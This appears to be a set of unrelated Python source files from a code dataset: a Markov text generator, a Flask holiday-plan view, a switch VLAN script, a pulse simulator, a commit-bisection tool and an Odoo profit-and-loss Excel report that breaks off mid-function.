    """Order-n Markov-chain word analyzer and random-text generator."""

    def __init__(self):
        self.suffix_map = {}  # map from prefixes to a list of suffixes
        self.prefix = ()      # current tuple of words

    def process_file(self, filename, order=2):
        """Reads a file and performs Markov analysis.

        filename: string
        order: integer number of words in the prefix

        Populates self.suffix_map (prefix tuple -> list of suffix words).
        """
        # `with` guarantees the file is closed (original leaked the handle).
        with open(filename) as fp:
            self.skip_gutenberg_header(fp)
            for line in fp:
                for word in line.rstrip().split():
                    self.process_word(word, order)

    def skip_gutenberg_header(self, fp):
        """Reads from fp until it finds the line that ends the header.

        fp: open file object
        """
        for line in fp:
            if line.startswith('*END*THE SMALL PRINT!'):
                break

    def process_word(self, word, order=2):
        """Processes each word.

        word: string
        order: integer

        During the first few iterations, all we do is store up the words;
        after that we start adding entries to the dictionary.
        """
        if len(self.prefix) < order:
            self.prefix += (word,)
            return

        # create the entry for this prefix if needed, then record the suffix
        self.suffix_map.setdefault(self.prefix, []).append(word)
        self.prefix = self.shift(self.prefix, word)

    def random_text(self, n=100):
        """Generates n random words from the analyzed text and prints them.

        Starts with a random prefix from the dictionary.

        n: number of words to generate
        """
        # choose a random prefix (not weighted by frequency)
        start = random.choice(list(self.suffix_map.keys()))

        for i in range(n):
            suffixes = self.suffix_map.get(start, None)
            if suffixes is None:
                # if the start isn't in map, we got to the end of the
                # original text, so we have to start again.
                # BUG FIX: was a bare `random_text(n-i)` call (NameError);
                # the recursion must go through self.
                self.random_text(n - i)
                return

            # choose a random suffix
            word = random.choice(suffixes)
            print(word, end=' ')
            start = self.shift(start, word)

    def shift(self, t, word):
        """Forms a new tuple by removing the head and adding word to the tail.

        t: tuple of strings
        word: string

        Returns: tuple of strings
        """
        return t[1:] + (word,)
if __name__ == '__main__':
    # Demo: analyze a corpus and emit a short run of generated text.
    corpus = 'emma.txt'
    num_words = 10

    chain = Markov()
    chain.process_file(corpus)
    chain.random_text(num_words)
    print()  # terminate the generated line
|
19,237 | 673e7bf521e2a08bb3efa3d2df9e33026160869d | from flask import Flask, render_template, request
import requests
from application import app, db
from application.models import holiday_plan
from sqlalchemy import desc
@app.route('/', methods=['GET','POST'])
def index():
    """Generate a random holiday (city + activity + price) via three backing
    microservices, persist it, and render the results page."""
    #get the name of the city
    city = requests.get("http://encounters_server2:5000/city")
    #get the activty
    activity = requests.get("http://encounters_server3:5000/activity")
    # the price service expects "<city> <activity>" as the raw POST body
    price_network = str(city.text) + " " + str(activity.text)
    price = requests.post("http://encounters_server4:5000/price", data=price_network)
    # NOTE(review): queried BEFORE the new plan is committed, so the list
    # shows the three plans that existed prior to this request --
    # presumably intentional ("previous holidays"); confirm with the template.
    last_3_holidays = holiday_plan.query.order_by(desc(holiday_plan.id)).limit(3).all()
    db.session.add(
        holiday_plan(
            city = city.text,
            activity = activity.text,
            price = price.text
        )
    )
    db.session.commit()
    return render_template('index.html', title='Holiday Generator',
        city = city.text,
        activity=activity.text, price = price.text,
        price_network=price_network,
        last_3_holidays=last_3_holidays)
|
19,238 | bfaf05accf860f602af707a3c292670bf94ac042 | import pyeapi
from pprint import pprint
import argparse
def check_vlan(a_list, vlan_id):
    """Return True if vlan_id is present in 'show vlan' output.

    a_list: pyeapi enable('show vlan') result -- a list whose first element
            maps 'result' -> 'vlans' -> {vlan-id-string: vlan-data}.
    vlan_id: VLAN number to look for (int, or anything int() accepts).

    Returns a bool. (The original returned None for "not found"; returning
    False is equivalent for all truth-testing callers.)
    """
    vlan_data = a_list[0]['result']['vlans']
    return any(int(vlan) == int(vlan_id) for vlan in vlan_data)
def main():
    """CLI entry point: add a VLAN on switch 'pynet-sw1', or remove it
    with --remove. Checks current state first so the operation is
    idempotent. (Python 2 syntax: uses print statements.)
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("vlan_id", help="vlan_id ",type=int)
    parser.add_argument("--remove", help="option to remove the vlan",action="store_true")
    args = parser.parse_args()
    vlan_id=args.vlan_id
    remove=args.remove
    data={}  # NOTE(review): unused -- candidate for removal
    pynet_sw1=pyeapi.connect_to('pynet-sw1')
    show_vlan_data=pynet_sw1.enable('show vlan')
    # True if the VLAN already exists on the switch
    result=check_vlan(show_vlan_data,vlan_id)
    if remove:
        if result:
            print 'VLAN exists, we will remove it \n'
            command_str = 'no vlan {}'.format(vlan_id)
            pynet_sw1.config([command_str])
        else:
            print 'VLAN doesn\'t exist, thus there is no point to remove it'
    else:
        if result:
            print 'VLAN exists, we will not create it'
        else:
            print 'Adding VLAN'
            command_str = 'vlan {}'.format(vlan_id)
            pynet_sw1.config([command_str])
# Run the CLI only when executed directly (not on import).
if __name__ == '__main__':
    main()
|
# Standard library
import random
from copy import copy  # needed by TwoOfFiveSimulator.makec

# Project modules
import DataStructures
from decoder import decoder
from helper import smart_datetime as datetime
from helper import smart_timedelta as timedelta
from objects import pulse
class TwoOfFiveSimulator(decoder):
    """Simulator that renders 2-of-5 style symbols into timed pulse trains."""

    def __init__(self, **kw):
        self.modulus = 0.5  # base duration (seconds) of a narrow bar
        decoder.__init__(self, **kw)

    def make(self, symbols, timeStamp, modulus=0.5, ratio=2.0, debug=False):
        """Render `symbols` as a pulse train starting at `timeStamp`.

        Symbols whose value is None are replaced by a random defined symbol.
        Returns (pulses, end_timeStamp); pulse times are shifted so the
        first peak becomes the time origin.
        """
        newSymbols = []
        for s in symbols:  # create random symbols if their values aren't defined
            if s.value is not None:
                newSymbols.append(s)
            else:
                newSymbols.append(self.symbols[random.randint(0, 99)])
        bars = []
        for nS in newSymbols:  # accumulate all of the bars
            bars.extend(nS.bars)
        pulses = []
        first_found = False
        first = None  # accumulated offset of the first peak, for re-zeroing
        for b in bars:  # iterate through the bars, creating pulses where needed
            time = modulus
            if b.wide:
                time = modulus * 2.0
            if b.peak:
                if first_found is False and first is not None:
                    first_found = True
                    first += timedelta(0, time / ratio)
                if first is None:
                    first_found = True
                    first = timedelta(0, time / ratio)
                pulses.append(pulse(timeStamp=timeStamp + timedelta(0, time / ratio)))
            # before the first peak, keep accumulating the lead-in offset
            if first_found is False and first is not None:
                first += timedelta(0, time)
            if first is None:
                first = timedelta(0, time)
            timeStamp += timedelta(0, time)
        # shift all pulses so the first peak is at the origin
        for i in range(len(pulses)):
            pulses[i].timeStamp = pulses[i].timeStamp - first
        return pulses, timeStamp

    def makec(self, symbols, time):
        """Resolve symbol values to defined symbols/identifiers and stamp
        each with consecutive start times beginning at `time`.

        Raises ValueError if a value matches no defined symbol/identifier.
        """
        real_symbols = []
        # for every symbol
        for symbol in symbols:
            if symbol.value is not None:
                value = symbol.value
            else:
                value = random.randint(0, 99)  # if not, create a random one
            # BUG FIX: `appended` was initialized inside the loops, so an
            # empty self.symbols list raised UnboundLocalError below.
            appended = False
            for realSymbol in self.symbols:  # find the corresponding real symbol
                if value == realSymbol.value:  # and the val match
                    real_symbols.append(realSymbol)  # keep the real symbol
                    appended = True
                    break  # quit when you're done
            if not appended:
                for identifier in self.identifiers:  # fall back to identifiers
                    if value == identifier.value:
                        real_symbols.append(identifier)
                        appended = True
                        break
            if not appended:
                raise ValueError('Could not find a defined symbol with value,', value)
        # now let's take care of the timeStamps
        final_symbols = []
        new_time = time
        for c in range(len(real_symbols)):
            # BUG FIX: `copy` was never imported (NameError at runtime);
            # now provided by `from copy import copy` at module level.
            # (Also removed a stray no-op `new_time` expression statement.)
            new_symbol = copy(real_symbols[c])
            new_symbol.timeStamp = copy(new_time)
            final_symbols.append(new_symbol)
            new_time = new_time + timedelta(0, len(real_symbols[c]) * self.modulus)
        return final_symbols
# Self-test harness (Python 2: note the print statements in test1).
if __name__ == '__main__':
    import unittest
    from symbol_generation import generateSymbols, generateIdentifiers

    class SimulationTests(unittest.TestCase):
        # NOTE(review): lower-case setup() is NOT unittest's setUp() hook,
        # so the tests that need it call it explicitly.
        def setup(self):
            self.sim = TwoOfFiveSimulator()
            self.sim.addSymbols(symbols=generateSymbols(),identifiers=generateIdentifiers())
        def testSetup(self):
            self.setup()
        def testInst(self):
            # construction with default arguments must succeed
            t = TwoOfFiveSimulator()
        def test1(self):
            # smoke-test make() on a symbol/identifier/symbol sequence
            self.setup()
            t = [self.sim.symbols[-1],self.sim.identifiers[0],self.sim.symbols[0]]
            print t
            print self.sim.make(t,datetime.now(),debug=True)
        # def testMakeChirp(self):
        #     self.setup()
        #     allChirps = Symbols.generate()
        #     t = mx.DateTime.now()
        #     print " "
        #     print "Start Time:",t
        #     data = self.sim.makec(allChirps[0:min(10,len(allChirps))],t)
        #     for d in data:
        #         print d
    unittest.main()
|
19,240 | 4e94414ea9fd5974b00271e9317ce6247d295ca6 | from abc import ABC
import utils.helpers as util
import json
import os
from enum import Enum
import csv
class Mode(ABC):
    """Base class for a bisection-style commit-checking "mode".

    A Mode owns a JSON cache of per-commit check results, a common logger,
    and a Traversal strategy (the nested binary-search variants below) that
    walks a commit list to locate breaking/fixing commits. Subclasses must
    implement checkIfBordersDiffer().
    """

    @staticmethod
    def factory(cfg):
        # Resolve the concrete Mode subclass named in cfg and instantiate it.
        modeClassName = util.checkAndGetClassnameByConfig(
            cfg, "modeMap", "mode"
        )
        cl = util.checkAndGetSubclass(modeClassName, Mode)
        return cl(cfg)

    def __init__(self, cfg) -> None:
        self.checkCfg(cfg)
        self.commitPath = self.CommitPath()
        # Pick the traversal strategy (a nested Traversal subclass) from cfg.
        traversalClassName = util.checkAndGetClassnameByConfig(
            cfg, "traversalMap", "traversal"
        )
        traversalClass = util.checkAndGetSubclass(
            traversalClassName, self.Traversal
        )
        self.traversal = traversalClass(self)
        self.cfg = cfg
        logPath = util.getActualPath("logPath", cfg)
        self.commonLogger = util.setupLogger(
            "commonLogger", logPath, "common_log.log"
        )

    def createCash(self):
        # In common case we use json.
        # Create cash is overrided if we need special algo for caching.
        cp = util.getActualPath("cachePath", self.cfg)
        if not os.path.exists(cp):
            os.makedirs(cp)
        self.cachePath = os.path.join(cp, "check_output_cache.json")
        initCacheMap = {}
        try:
            with open(self.cachePath, "r+") as cacheDump:
                if self.cfg["clearCache"]:
                    # wipe and re-initialize the cache file
                    cacheDump.truncate(0)
                    json.dump(initCacheMap, cacheDump)
                else:
                    try:
                        json.load(cacheDump)
                    except json.decoder.JSONDecodeError:
                        # corrupt or empty cache file: reset it
                        json.dump(initCacheMap, cacheDump)
        except FileNotFoundError:
            # first run: create the cache file with an empty map
            with open(self.cachePath, "w") as cacheDump:
                json.dump(initCacheMap, cacheDump)
                cacheDump.close()

    def getCommitIfCashed(self, commit):
        # Return (True, cached_value) when `commit` is in the cache,
        # otherwise (False, None).
        with open(self.cachePath, "r") as cacheDump:
            cacheData = json.load(cacheDump)
            cacheDump.close()
        if commit in cacheData:
            return True, cacheData[commit]
        else:
            return False, None

    def setCommitCash(self, commit, valueToCache):
        # Persist a check result for `commit`; raises CashError on duplicates.
        isCommitCashed, _ = self.getCommitIfCashed(commit)
        if isCommitCashed:
            raise util.CashError("Commit already cashed")
        else:
            with open(self.cachePath, "r+", encoding="utf-8") as cacheDump:
                cacheData = json.load(cacheDump)
                cacheData[commit] = valueToCache
                # rewrite the whole file in place
                cacheDump.seek(0)
                json.dump(cacheData, cacheDump, indent=4)
                cacheDump.truncate()
                cacheDump.close()

    def checkCfg(self, cfg):
        # Minimal config validation; subclasses may extend.
        if not ("traversal" in cfg["runConfig"]):
            raise util.CfgError("traversal is not configured")

    def prepareRun(self, i1, i2, list, cfg):
        # Reset per-run service state and verify the borders actually differ
        # (otherwise a bisection makes no sense).
        cfg["serviceConfig"] = {}
        if cfg["checkIfBordersDiffer"] and not self.checkIfListBordersDiffer(
                list, cfg):
            raise util.RepoError("Borders {i1} and {i2} doesn't differ".format(
                i1=i1, i2=i2))
        self.commitList = list

    def postRun(self, list):
        # Restore the repo to its original version and, if configured,
        # dump all cached results to report.csv.
        util.returnToActualVersion(self.cfg)
        if "printCSV" in self.cfg and self.cfg["printCSV"]:
            fields = ['linId', 'logId', 'hash', 'value']
            rows = []
            linearId = 0   # index within the full commit list
            logId = 0      # index among commits that were actually checked
            for item in list:
                item = item.replace('"', "")
                isCommitCashed, value = self.getCommitIfCashed(item)
                if isCommitCashed:
                    row = [linearId, logId, item, value]
                    rows.append(row)
                    logId = logId + 1
                linearId = linearId + 1
            reportPath = util.getActualPath("logPath", self.cfg)
            reportPath = os.path.join(reportPath, "report.csv")
            with open(reportPath, 'w') as csvfile:
                csvwriter = csv.writer(csvfile)
                csvwriter.writerow(fields)
                csvwriter.writerows(rows)

    def run(self, i1, i2, list, cfg) -> int:
        # Entry point: bisect commits list[i1..i2] with the configured traversal.
        self.prepareRun(i1, i2, list, cfg)
        self.traversal.bypass(
            i1, i2, list, cfg, self.commitPath
        )
        self.postRun(list)

    def setOutputInfo(self, pathCommit):
        # override if you need more details in output representation
        pass

    def getResult(self):
        # override if you need more details in output representation
        for pathcommit in self.commitPath.getList():
            print("Break commit: {c}".format(
                c=self.commitList[pathcommit.id])
            )

    def checkIfBordersDiffer(self, i1, i2, list, cfg):
        # Subclass responsibility: does list[i1] behave differently from list[i2]?
        raise NotImplementedError("checkIfBordersDiffer() is not implemented")

    def checkIfListBordersDiffer(self, list, cfg):
        # Convenience wrapper: compare the first and last commits.
        return self.checkIfBordersDiffer(0, len(list) - 1, list, cfg)

    class CommitPath:
        # Ordered collection of PathCommit entries reported by a traversal.

        def __init__(self):
            self.commitList = []

        def accept(self, traversal, commitToReport) -> None:
            # Visitor pattern: let the traversal record the commit.
            traversal.visit(self, commitToReport)

        class CommitState(Enum):
            BREAK = 1
            SKIPPED = 2

        class PathCommit:
            def __init__(self, id, state):
                self.id = id        # index into the commit list
                self.state = state  # a CommitState value

        def append(self, commit):
            self.commitList.append(commit)

        def pop(self):
            return self.commitList.pop(0)

        def getList(self):
            return self.commitList

    class Traversal(ABC):
        def bypass(self, i1, i2, list, cfg, commitPath) -> int:
            raise NotImplementedError()

        def visit(self, cPath, commitToReport):
            cPath.append(commitToReport)

        def prepBypass(self, i1, i2, list, cfg):
            # Mark whether cleaning can be skipped for small intervals,
            # and log the interval being checked.
            skipInterval = cfg["noCleanInterval"]
            cfg["serviceConfig"]["skipCleanInterval"] = i2 - i1 < skipInterval
            self.mode.commonLogger.info(
                "Check interval {i1}..{i2}".format(i1=i1, i2=i2)
            )
            self.mode.commonLogger.info(
                "Check commits {c1}..{c2}".format(c1=list[i1], c2=list[i2])
            )

        def __init__(self, mode) -> None:
            self.mode = mode

    class FirstFailedVersion(Traversal):
        # Binary search for the first commit that differs from the sample
        # commit (i.e. the first "failed" version).

        def __init__(self, mode) -> None:
            super().__init__(mode)

        def bypass(self, i1, i2, list, cfg, commitPath) -> int:
            self.prepBypass(i1, i2, list, cfg)
            sampleCommit = 0
            if "sampleCommit" in cfg["serviceConfig"]:
                sampleCommit = cfg["serviceConfig"]["sampleCommit"]
            if i1 + 1 >= i2:
                # interval narrowed to a neighbouring pair: report the break
                isBad = self.mode.checkIfBordersDiffer(
                    sampleCommit, i1, list, cfg)
                breakCommit = i1 if isBad else i2
                pc = Mode.CommitPath.PathCommit(
                    breakCommit,
                    Mode.CommitPath.CommitState.BREAK
                )
                self.mode.setOutputInfo(pc)
                commitPath.accept(self, pc)
                return
            mid = (int)((i1 + i2) / 2)
            isBad = self.mode.checkIfBordersDiffer(
                sampleCommit, mid, list, cfg)
            if isBad:
                self.bypass(
                    i1, mid, list, cfg, commitPath
                )
            else:
                self.bypass(
                    mid, i2, list, cfg, commitPath
                )

    class FirstFixedVersion(Traversal):
        # Binary search for the first commit that matches the sample again
        # (i.e. the first "fixed" version); mirror image of FirstFailedVersion.

        def __init__(self, mode) -> None:
            super().__init__(mode)

        def bypass(self, i1, i2, list, cfg, commitPath) -> int:
            self.prepBypass(i1, i2, list, cfg)
            sampleCommit = 0
            if "sampleCommit" in cfg["serviceConfig"]:
                sampleCommit = cfg["serviceConfig"]["sampleCommit"]
            if i1 + 1 >= i2:
                isBad = self.mode.checkIfBordersDiffer(
                    sampleCommit, i1, list, cfg)
                breakCommit = i2 if isBad else i1
                pc = Mode.CommitPath.PathCommit(
                    breakCommit,
                    Mode.CommitPath.CommitState.BREAK
                )
                self.mode.setOutputInfo(pc)
                commitPath.accept(self, pc)
                return
            mid = (int)((i1 + i2) / 2)
            isBad = self.mode.checkIfBordersDiffer(
                sampleCommit, mid, list, cfg)
            if isBad:
                self.bypass(
                    mid, i2, list, cfg, commitPath
                )
            else:
                self.bypass(
                    i1, mid, list, cfg, commitPath
                )

    class AllBreakVersions(Traversal):
        # Like FirstFailedVersion, but after reporting a break commit it
        # re-bisects the remaining tail of the list for further breaks.

        def __init__(self, mode) -> None:
            super().__init__(mode)

        def bypass(self, i1, i2, list, cfg, commitPath) -> int:
            self.prepBypass(i1, i2, list, cfg)
            sampleCommit = 0
            if "sampleCommit" in cfg["serviceConfig"]:
                sampleCommit = cfg["serviceConfig"]["sampleCommit"]
            if i1 + 1 >= i2:
                isBad = self.mode.checkIfBordersDiffer(
                    sampleCommit, i1, list, cfg)
                breakCommit = i1 if isBad else i2
                pc = Mode.CommitPath.PathCommit(
                    breakCommit,
                    Mode.CommitPath.CommitState.BREAK
                )
                self.mode.setOutputInfo(pc)
                commitPath.accept(self, pc)
                # keep searching past the found break if the tail still differs
                lastCommit = len(list) - 1
                isTailDiffer = self.mode.checkIfBordersDiffer(
                    breakCommit, lastCommit, list, cfg)
                if isTailDiffer:
                    cfg["serviceConfig"]["sampleCommit"] = breakCommit
                    self.bypass(
                        breakCommit, lastCommit,
                        list, cfg, commitPath
                    )
                return
            mid = (int)((i1 + i2) / 2)
            isBad = self.mode.checkIfBordersDiffer(
                sampleCommit, mid, list, cfg)
            if isBad:
                self.bypass(
                    i1, mid, list, cfg, commitPath
                )
            else:
                self.bypass(
                    mid, i2, list, cfg, commitPath
                )
|
19,241 | 899638f123748847844d83da49ac8d0969056bbd | # -*- coding: utf-8 -*-
import xlwt
import base64
from io import StringIO
from odoo import api, fields, models, _
class AccountProfitLossReport(models.TransientModel):
_name = "account.profit.loss.excel.report"
_description = 'Account Profit Loss Excel Report'
start_date = fields.Date(string='Start Date', required=True)
end_date = fields.Date(string='End Date', required=True)
region_ids = fields.Many2many('res.branch', string='Region')
city_ids = fields.Many2many('res.city', string='City')
product_ids = fields.Many2many('product.product', string='Products')
@api.multi
def print_excel(self):
file = StringIO()
workbook = xlwt.Workbook()
format0 = xlwt.easyxf('font:height 600,bold True;align: horiz left')
format1 = xlwt.easyxf('font:bold True;align: horiz left')
format2 = xlwt.easyxf('font:height 300,bold True;pattern: pattern solid, fore_colour gray25;align: horiz center;borders: left thin, right thin, top thin, bottom thin;')
format3 = xlwt.easyxf('font:height 200,bold True;pattern: pattern solid, fore_colour gray25;align: horiz center;borders: left thin, right thin, top thin, bottom thin;')
format4 = xlwt.easyxf('font:height 200,bold True;align: horiz center;borders: right thin, bottom thin;')
format5 = xlwt.easyxf('font:height 200,bold True;align: horiz center;borders: right thin;')
format6 = xlwt.easyxf('font:height 200,bold True;align: horiz center;borders: right thin, left thin;')
format7 = xlwt.easyxf('font:height 200,bold True;align: horiz center;borders: right thin, left thin, bottom thin;')
format8 = xlwt.easyxf('font:height 200,bold True,colour red;pattern: pattern solid, fore_colour light_green;align: horiz left;borders: left thin, right thin, top thin, bottom thin;')
format9 = xlwt.easyxf('font:height 200;align: horiz left;borders: left thin, right thin, top thin, bottom thin;')
format10 = xlwt.easyxf('font:height 200;align: horiz right;borders: left thin, right thin, top thin, bottom thin;')
format11 = xlwt.easyxf('font:height 200,bold True;align: horiz right;borders: left thin, right thin, top thin, bottom thin;')
format12 = xlwt.easyxf('font:height 200,bold True;align: horiz right;borders: left thin, right thin, top thin, bottom thin;pattern: pattern solid, fore_colour cyan_ega;')
format13 = xlwt.easyxf('font:height 200,bold True;pattern: pattern solid, fore_colour gray25;align: horiz center;borders: left thin, right thin, top thin, bottom thin;')
format14 = xlwt.easyxf('font:height 200,bold True;align: horiz right;borders: left thin, right thin, top thin, bottom thin;pattern: pattern solid, fore_colour orange;')
format15 = xlwt.easyxf('font:height 200,bold True;pattern: pattern solid, fore_colour orange;align: horiz center;borders: left thin, right thin, top thin, bottom thin;')
sheet = workbook.add_sheet('Project Profit & Loss Analysis')
sheet.col(7).width = 256 * 20
sheet.col(8).width = 256 * 20
sheet.col(9).width = 256 * 20
sheet.col(10).width = 256 * 20
sheet.col(11).width = 256 * 18
sheet.col(12).width = 256 * 20
sheet.col(13).width = 256 * 20
sheet.col(14).width = 256 * 20
sheet.col(15).width = 256 * 20
sheet.col(16).width = 256 * 18
sheet.write_merge(0, 3, 0, 6, 'Zaki Advertising Company', format0)
sheet.write_merge(4, 4, 0, 3, 'Project Profit & Loss Analysis', format1)
sheet.write_merge(6, 8, 0, 3, 'Location', format2)
sheet.write_merge(6, 8, 4, 6, 'Network', format2)
sheet.write_merge(6, 6, 7, 8, 'Sales - Rent', format3)
sheet.write(7, 7, '4100003', format5)
sheet.write(7, 8, '4100005', format5)
sheet.write(8, 7, 'Sales-Rent', format4)
sheet.write(8, 8, 'Sales-Rent Prvt.', format4)
sheet.write_merge(6, 6, 9, 10, 'Sales - Print', format3)
sheet.write(7, 9, '4100002', format5)
sheet.write(7, 10, '4100004', format5)
sheet.write(8, 9, 'Sales-Print', format4)
sheet.write(8, 10, 'Sales-Print Prvt.', format4)
sheet.write_merge(6, 8, 11, 11, 'Total Sales', format2)
sheet.write_merge(6, 6, 12, 13, 'COS - Rent', format3)
sheet.write(7, 12, '5100003', format5)
sheet.write(7, 13, '5100005', format5)
sheet.write(8, 12, 'COS-Rent', format4)
sheet.write(8, 13, 'COS-Rent Prvt.', format4)
sheet.write_merge(6, 6, 14, 15, 'COS - Print', format3)
sheet.write(7, 14, '5100002', format5)
sheet.write(7, 15, '5100004', format5)
sheet.write(8, 14, 'COS-Print', format4)
sheet.write(8, 15, 'COS-Print Prvt.', format4)
sheet.write_merge(6, 8, 16, 16, 'Total COS', format2)
sheet.col(17).width = 256 * 3
sheet.col(18).width = 256 * 20
sheet.col(19).width = 256 * 20
sheet.col(20).width = 256 * 20
sheet.col(21).width = 256 * 20
sheet.col(22).width = 256 * 20
sheet.col(23).width = 256 * 20
sheet.col(24).width = 256 * 20
sheet.col(25).width = 256 * 20
sheet.col(26).width = 256 * 20
sheet.col(27).width = 256 * 20
sheet.col(28).width = 256 * 18
sheet.write_merge(6, 6, 18, 27, 'OH COS', format3)
sheet.write(7, 18, '5200001', format6)
sheet.write(7, 19, '5200002', format6)
sheet.write(7, 20, '5200003', format6)
sheet.write(7, 21, '5200004', format6)
sheet.write(7, 22, '5200005', format6)
sheet.write(7, 23, '5200006', format6)
sheet.write(7, 24, '5200007', format6)
sheet.write(7, 25, '5200008', format6)
sheet.write(7, 26, '5200009', format6)
sheet.write(7, 27, '5200010', format6)
sheet.write(8, 18, 'Bank Chrgs', format7)
sheet.write(8, 19, 'Maintenance', format7)
sheet.write(8, 20, 'Assets Depr.', format7)
sheet.write(8, 21, 'Rent & Rates', format7)
sheet.write(8, 22, 'Buss. Travel', format7)
sheet.write(8, 23, 'Sub-Allw.', format7)
sheet.write(8, 24, 'Other Transpt', format7)
sheet.write(8, 25, 'Sales Comm', format7)
sheet.write(8, 26, 'Volume Rebate', format7)
sheet.write(8, 27, 'Others', format7)
sheet.write_merge(6, 8, 28, 28, 'Total OH COS', format3)
sheet.col(29).width = 256 * 3
sheet.col(30).width = 256 * 20
sheet.col(31).width = 256 * 20
sheet.col(32).width = 256 * 20
sheet.col(33).width = 256 * 20
sheet.write_merge(6, 6, 30, 33, 'Total', format3)
sheet.write_merge(7, 8, 30, 30, 'Sales', format7)
sheet.write_merge(7, 8, 31, 31, 'COS', format7)
sheet.write_merge(7, 8, 32, 32, 'Total GP', format7)
sheet.write_merge(7, 8, 33, 33, 'GP%', format7)
final_data = []
domain = [('date', '>=', self.start_date), ('date', '<=', self.end_date),
('branch_id', '!=', False), ('city_id', '!=', False),
('account_id.code', 'in', ['5200001', '5200002', '5200003', '5200004',
'5200005', '5200006', '5200007', '5200008', '5200009', '5200010',
'4100002', '4100003', '4100004', '4100005', '5100003', '5100005', '5100002', '5100004']),
('product_id', '!=', False), ('account_id', '!=', False)]
if self.region_ids:
domain += [('branch_id', 'in', self.region_ids.ids)]
if self.city_ids:
domain += [('city_id', 'in', self.city_ids.ids)]
if self.product_ids:
domain += [('product_id', 'in', self.product_ids.ids)]
move_line_ids = self.env['account.move.line'].search(domain)
if move_line_ids:
region_ids = self.region_ids if self.region_ids else self.env['res.branch'].search([])
city_ids = self.city_ids if self.city_ids else self.env['res.city'].search([('branch_id', '!=', False), ('branch_id', 'in', region_ids.ids)])
for region_id in region_ids:
values = {'region': region_id}
region_move_lines = move_line_ids.filtered(lambda r: r.branch_id.id == region_id.id)
city_data = []
if region_move_lines:
for city_id in city_ids.filtered(lambda r: r.branch_id.id == region_id.id):
city_move_lines = region_move_lines.filtered(lambda r:r.city_id.id == city_id.id)
for city_move_line_id in city_move_lines:
city_values = {
'product_id': city_move_line_id.product_id,
'debit_total': city_move_line_id.debit,
'credit_total': city_move_line_id.credit,
'code': city_move_line_id.account_id.code,
'city': city_id
}
city_data.append(city_values)
other_data = []
region_final_data = []
if city_data:
for line in city_data:
if {'city': line.get('city'), 'product_id': line.get('product_id')} in other_data:
for temp in region_final_data:
if temp.get('city') and temp.get('product_id') and temp.get('city') == line.get('city') \
and temp.get('product_id') == line.get('product_id'):
dict1 = temp.get('code_data')
if dict1.get(line.get('code')):
dict1.get(line.get('code')).append({'deposit_amount': line.get('debit_total'), 'credit_amount': line.get('credit_total')})
else:
dict1[line.get('code')] = [{'deposit_amount': line.get('debit_total'), 'credit_amount': line.get('credit_total')}]
temp['code_data'] = dict1
else:
other_data.append({'city': line.get('city'), 'product_id': line.get('product_id')})
region_final_data_values = {
'city': line.get('city'),
'product_id': line.get('product_id'),
'code_data': {line.get('code'): [{'deposit_amount': line.get('debit_total'), 'credit_amount': line.get('credit_total')}]}
}
region_final_data.append(region_final_data_values)
values.update({
'lines_data': region_final_data
})
final_data.append(values)
print (">>>>>>>", final_data)
print (">>>>>>>\n\n")
row = 9
final_total_code_4100003 = 0.0
final_total_code_4100005 = 0.0
final_total_code_4100002 = 0.0
final_total_code_4100004 = 0.0
final_total_code_5100003 = 0.0
final_total_code_5100005 = 0.0
final_total_code_5100002 = 0.0
final_total_code_5100004 = 0.0
final_total_code_5200001 = 0.0
final_total_code_5200002 = 0.0
final_total_code_5200003 = 0.0
final_total_code_5200004 = 0.0
final_total_code_5200005 = 0.0
final_total_code_5200006 = 0.0
final_total_code_5200007 = 0.0
final_total_code_5200008 = 0.0
final_total_code_5200009 = 0.0
final_total_code_5200010 = 0.0
final_sales_total = 0.0
final_purchase_total = 0.0
final_difference_total = 0.0
final_other_cos_total = 0.0
final_gp_percent_total = 0.0
for excel_data in final_data:
print (">>>>>>>excel_data.get('region').name", excel_data.get('region').name)
sheet.write_merge(row, row, 0, 3, excel_data.get('region').name, format8)
sheet.write_merge(row, row, 4, 6, '', format8)
sheet.write_merge(row, row, 7, 8, '', format8)
sheet.write_merge(row, row, 9, 10, '', format8)
sheet.write(row, 11, '', format8)
sheet.write_merge(row, row, 12, 13, '', format8)
sheet.write_merge(row, row, 14, 15, '', format8)
sheet.write(row, 16, '', format8)
sheet.write_merge(row, row, 18, 27, '', format8)
sheet.write(row, 28, '', format8)
sheet.write_merge(row, row, 30, 33, '', format8)
row += 1
city_names = []
semi_total_code_4100003 = 0.0
semi_total_code_4100005 = 0.0
semi_total_code_4100002 = 0.0
semi_total_code_4100004 = 0.0
semi_total_code_5100003 = 0.0
semi_total_code_5100005 = 0.0
semi_total_code_5100002 = 0.0
semi_total_code_5100004 = 0.0
semi_total_code_5200001 = 0.0
semi_total_code_5200002 = 0.0
semi_total_code_5200003 = 0.0
semi_total_code_5200004 = 0.0
semi_total_code_5200005 = 0.0
semi_total_code_5200006 = 0.0
semi_total_code_5200007 = 0.0
semi_total_code_5200008 = 0.0
semi_total_code_5200009 = 0.0
semi_total_code_5200010 = 0.0
semi_sales_total = 0.0
semi_purchase_total = 0.0
semi_difference_total = 0.0
semi_other_cos_total = 0.0
semi_gp_percent_total = 0.0
for excel_lines in excel_data.get('lines_data'):
sheet.write_merge(row, row, 0, 3, excel_lines.get('city').name, format9)
sheet.write_merge(row, row, 4, 6, excel_lines.get('product_id').name, format9)
code_data = excel_lines.get('code_data')
code_4100003 = 0.0
code_4100005 = 0.0
code_4100002 = 0.0
code_4100004 = 0.0
code_5100003 = 0.0
code_5100005 = 0.0
code_5100002 = 0.0
code_5100004 = 0.0
code_5200001 = 0.0
code_5200002 = 0.0
code_5200003 = 0.0
code_5200004 = 0.0
code_5200005 = 0.0
code_5200006 = 0.0
code_5200007 = 0.0
code_5200008 = 0.0
code_5200009 = 0.0
code_5200010 = 0.0
if code_data.get('4100003'):
deposit_amount_4100003 = sum([rec.get('deposit_amount') for rec in code_data.get('4100003')])
credit_amount_4100003 = sum([rec.get('credit_amount') for rec in code_data.get('4100003')])
code_4100003 = deposit_amount_4100003 - credit_amount_4100003
if code_data.get('4100005'):
deposit_amount_4100005 = sum([rec.get('deposit_amount') for rec in code_data.get('4100005')])
credit_amount_4100005 = sum([rec.get('credit_amount') for rec in code_data.get('4100005')])
code_4100005 = deposit_amount_4100005 - credit_amount_4100005
if code_data.get('4100002'):
deposit_amount_4100002 = sum([rec.get('deposit_amount') for rec in code_data.get('4100002')])
credit_amount_4100002 = sum([rec.get('credit_amount') for rec in code_data.get('4100002')])
code_4100002 = deposit_amount_4100002 - credit_amount_4100002
if code_data.get('4100004'):
